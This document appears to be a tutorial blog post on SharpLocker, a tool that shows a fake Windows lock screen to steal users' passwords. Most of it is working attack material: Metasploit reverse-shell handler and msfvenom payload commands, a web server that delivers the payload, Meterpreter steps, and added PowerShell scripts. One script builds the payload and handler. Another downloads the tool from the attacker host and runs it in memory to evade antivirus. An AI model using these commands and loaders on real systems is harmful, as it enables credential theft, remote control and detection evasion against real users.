SharpLocker
SharpLocker is a tool that helps hackers steal Windows credentials by popping up a fake Windows lock screen. All of its output is written to the console, which works well with Cobalt Strike or Metasploit. The tool is meant to be injected into memory so that it never touches disk, which helps it avoid detection.
How to use SharpLocker with Metasploit
Suppose you have a foothold on a Windows machine and want to try to capture the logged-on user's credentials.
Assuming you have a Meterpreter session, you can upload SharpLocker.exe and execute it directly.
Note: running the .exe from disk is not the intended way of using SharpLocker. It is supposed to be injected into memory and never touch disk, but this method does work. Dropping the binary on disk could get it detected by heuristic analysis. See the lab below for more details.
```
# in the meterpreter session: upload the binary, then run it from a shell
upload SharpLocker.exe
shell
SharpLocker.exe
```
At this point a screen should pop up that looks identical to the Windows logon screen.
When the user enters their password it is written to the Meterpreter session for you to use.
Let’s Look at the Source Code
To clone the GitHub repository you can run this command.
```
git clone https://github.com/Pickfordmatt/SharpLocker
```
SharpLocker’s GitHub Repository
Full Walkthrough & Lab Setup
In this lab, I’m going to do this in a Windows environment using a Docker image of Parrot OS and run a Windows 10 Enterprise victim machine in Hyper-V. I wasn’t able to get this to work in Windows Sandbox (wouldn’t return password) so I decided to use a Hyper-V image.
I’ll also do things slightly differently than in the initial demo.
Attack Machine Firewall
Make sure ports 4444 and 8080 are open for inbound traffic on the attack machine: 4444 is the Meterpreter callback port and 8080 is the web server that serves the payload.
Windows 10 Enterprise Setup
Trial Windows 10 Enterprise Hyper-V
https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/
You will need to create a user or change the password of the default user in Windows 10.
For this demo, we will also disable the antivirus in the VM. Windows Defender, the built-in antivirus on Windows 10, is quick to pick up Meterpreter payloads. There are ways around this but that's not what this tutorial is about. Focus!
Default Windows 10 Enterprise password is: “Passw0rd!”
Metasploit Listener in Parrot OS (Docker)
Being that I am a .NET developer who loves Docker, I want to demonstrate this on Windows using a Docker image of Parrot OS.
```
# create a parrotos/work dir if you don't already have one...
mkdir -p parrotos/work
cd parrotos

# start parrotos from docker, bind-mounting ./work to /work in the container
# (run this from the parrotos folder so $PWD/work points at the folder just created)
docker run --rm -it -v "$PWD/work:/work" -p 4444:4444 parrotsec/security

# inside the container, go into the work folder
cd /work
```
Let me explain what some of these Docker flags do.
--rm – removes the container when it exits.
-it – gives us an interactive terminal into the container.
-v – a bind mount that maps our local parrotos/work folder to /work in the container's root filesystem.
-p 4444:4444 – maps host port 4444 to the container's port 4444 (the Meterpreter callback).
-p 8080:8080 – used on the second container below; maps host port 8080 to the container's port 8080 (the web server that serves the payload).
Start Metasploit Multi Handler to Catch the Shell
```
# start msfconsole inside the container, then:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
# the host's LAN IP (192.168.0.12) is not an interface inside the container, so the
# handler must bind to all interfaces; Docker's -p 4444:4444 forwards the host's port in
set LHOST 0.0.0.0
set LPORT 4444
run
```
Msfvenom Meterpreter Payload
You'll need your host's IP address on the local LAN for this demonstration; it is the address the victim VM calls back to.
```
# get local lan ip (on the Windows host)
ipconfig
```
```
# start parrotos from docker (2nd tab, for msfvenom), with the same bind mount
docker run --rm -it -v "$PWD/work:/work" -p 8080:8080 parrotsec/security

# inside the container, go into the work folder
cd /work

# generate the meterpreter payload. LHOST is the host's LAN IP the victim calls back to,
# and the payload name must match the one set in the multi/handler exactly
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=4444 -e x86/shikata_ga_nai -f exe -o msf.exe
```
For the sake of this demonstration, we're just going to drop the Meterpreter payload onto the machine and run it so that we get a session back on our multi handler.
I’m going to use the python3 built in webserver to drop the msf.exe. Make sure you are in the work folder.
```
# run python web server from the work folder
python3 -m http.server 8080
```
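As an added example that is not part of the original post, here is the same handler, payload and web-server setup driven from the Windows host in PowerShell, since that is where the Docker commands in this lab are typed. It defines the payload name, callback address and port once so msfvenom and the multi handler cannot drift apart, and it binds the handler inside the container to 0.0.0.0 because the host's LAN IP is not an interface there. Assumptions: Docker Desktop with the parrotsec/security image (with msfvenom, msfconsole and Python 3.7+ available, as the lab already relies on), 192.168.0.12 as this host's LAN address (take yours from ipconfig), and a parrotos\work folder under the current directory.

```powershell
# Added example, not part of the original post or the SharpLocker project.
# Run from the Windows host in PowerShell; assumes Docker Desktop and the
# parrotsec/security image. 192.168.0.12 is an assumed LAN address, take yours from ipconfig.
$LHost   = '192.168.0.12'                    # host LAN IP the victim calls back to
$LPort   = 4444
$Payload = 'windows/meterpreter/reverse_tcp' # staged; defined once, used by msfvenom AND the handler
$Image   = 'parrotsec/security'
$Work    = Join-Path $PWD 'parrotos\work'
New-Item -ItemType Directory -Force -Path $Work | Out-Null

# Handler resource script. Inside the container the host's LAN IP is not a local
# interface, so bind to 0.0.0.0 and let Docker's -p forward host:4444 in.
# ExitOnSession false keeps the handler up for further callbacks.
@"
use exploit/multi/handler
set payload $Payload
set LHOST 0.0.0.0
set LPORT $LPort
set ExitOnSession false
exploit -j
"@ | Set-Content -Path (Join-Path $Work 'handler.rc') -Encoding ascii

# 1) Build the payload in a throwaway container; output lands in .\parrotos\work\msf.exe
docker run --rm -v "${Work}:/work" $Image `
    msfvenom -a x86 --platform windows -p $Payload "LHOST=$LHost" "LPORT=$LPort" `
    -e x86/shikata_ga_nai -f exe -o /work/msf.exe

# 2) Serve the work folder on 8080 in a background container
#    (docker stop sharplocker-www ends it; --directory needs Python 3.7+)
docker run --rm -d --name sharplocker-www -v "${Work}:/work" -p 8080:8080 $Image `
    python3 -m http.server 8080 --directory /work

# 3) Start the handler in the foreground; on the victim, fetch http://<LHost>:8080/msf.exe and run it
docker run --rm -it -v "${Work}:/work" -p "${LPort}:${LPort}" $Image `
    msfconsole -q -r /work/handler.rc
```

The resource script is the same set of commands shown above for the multi handler; keeping it in the shared work folder means both containers see it, and the single $Payload variable is what prevents the staged/stageless mismatch that otherwise leaves the handler silent when the victim connects.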
Stealing Creds with SharpLocker
In order to call SharpLocker from PowerShell as [SharpLocker.Program]::Main(), we need to make the Program class and its Main method public. This is the easy way; there are other ways (for example, invoking the assembly's entry point through reflection, which ignores C# visibility).
Program.cs
Change "static class Program" to "public static class Program", and also change "static void Main()" to "public static void Main()".
```csharp
using System;
using System.Windows.Forms;

namespace SharpLocker
{
    // public so PowerShell can reach [SharpLocker.Program]::Main()
    public static class Program
    {
        /// <summary>
        /// The main entry point for the application.
        /// </summary>
        [STAThread]
        public static void Main()
        {
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false);
            Application.Run(new LockScreenForm());
        }
    }
}
```
Then recompile the project.
At this point, we should have a Meterpreter session. We'll assume this is a hypothetical situation where we've established a foothold on a machine. Now we can upload SharpLocker.exe, load it into PowerShell's memory and run it from there.
```
# in the first tab, inside the meterpreter session (multi handler)
upload SharpLocker.exe

# get the current directory on the victim
pwd
# returns C:\Users\User\Downloads

# load the PowerShell extension
load powershell

# load the uploaded assembly into the PowerShell session and call the (now public) entry point;
# the path goes in single quotes so the meterpreter console does not eat the quotes
powershell_execute "[Reflection.Assembly]::LoadFile('C:\Users\User\Downloads\SharpLocker.exe')"
powershell_execute "[SharpLocker.Program]::Main()"
```
I checked it in the Task Manager by hitting CTRL + ALT + DELETE.
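As an added example (not from the original post or the SharpLocker project), the following PowerShell script does what the Program.cs edit and the powershell_execute steps above achieve, but without touching disk on the victim and without making Program or Main public: it loads the compiled SharpLocker.exe from a byte array and starts it through the assembly's entry point via reflection. Assumptions: the lab's python http.server on 192.168.0.12:8080 is serving SharpLocker.exe; pass a local path instead (for example the C:\Users\User\Downloads\SharpLocker.exe uploaded above) if you prefer the upload route.

```powershell
# Added example, not part of the original post or the SharpLocker project.
# Loads a .NET assembly from memory and invokes its entry point by reflection.
# $Source is an assumption: the lab's http.server on the attack host, or a local file path.
param(
    [string]$Source = 'http://192.168.0.12:8080/SharpLocker.exe'
)

# Get the assembly bytes either over HTTP (no file is written by this process)
# or from a file that is already on disk.
if ($Source -match '^https?://') {
    $bytes = (New-Object System.Net.WebClient).DownloadData($Source)
} else {
    $bytes = [System.IO.File]::ReadAllBytes($Source)
}

# Load the assembly from the byte array. Caveat: on .NET Framework 4.8 and later
# Assembly.Load(byte[]) is itself passed to AMSI, so "never touches disk"
# does not mean "never scanned".
$asm = [System.Reflection.Assembly]::Load($bytes)

# Locate the entry point (Main). MethodInfo.Invoke ignores C# visibility, which is
# why the class and method do not have to be made public for this route.
$entry = $asm.EntryPoint
if (-not $entry) { throw "No entry point found in $Source" }

# SharpLocker's Main() takes no arguments. Also handle a Main(string[] args)
# so the same loader works for other .NET tools.
$invokeArgs = $null
if ($entry.GetParameters().Count -gt 0) {
    # one parameter: an empty string[] for args
    $invokeArgs = [object[]]@(, [string[]]@())
}

# Application.Run in Main blocks this thread until the fake lock screen closes.
# Whatever SharpLocker writes to stdout comes back through the calling
# PowerShell session, which is what the meterpreter powershell extension returns.
$entry.Invoke($null, $invokeArgs)
```

Save it as a .ps1 and bring it into the session with the powershell extension's powershell_import command, or paste the body into powershell_execute; either way the only on-disk artifact is the script, not the SharpLocker binary.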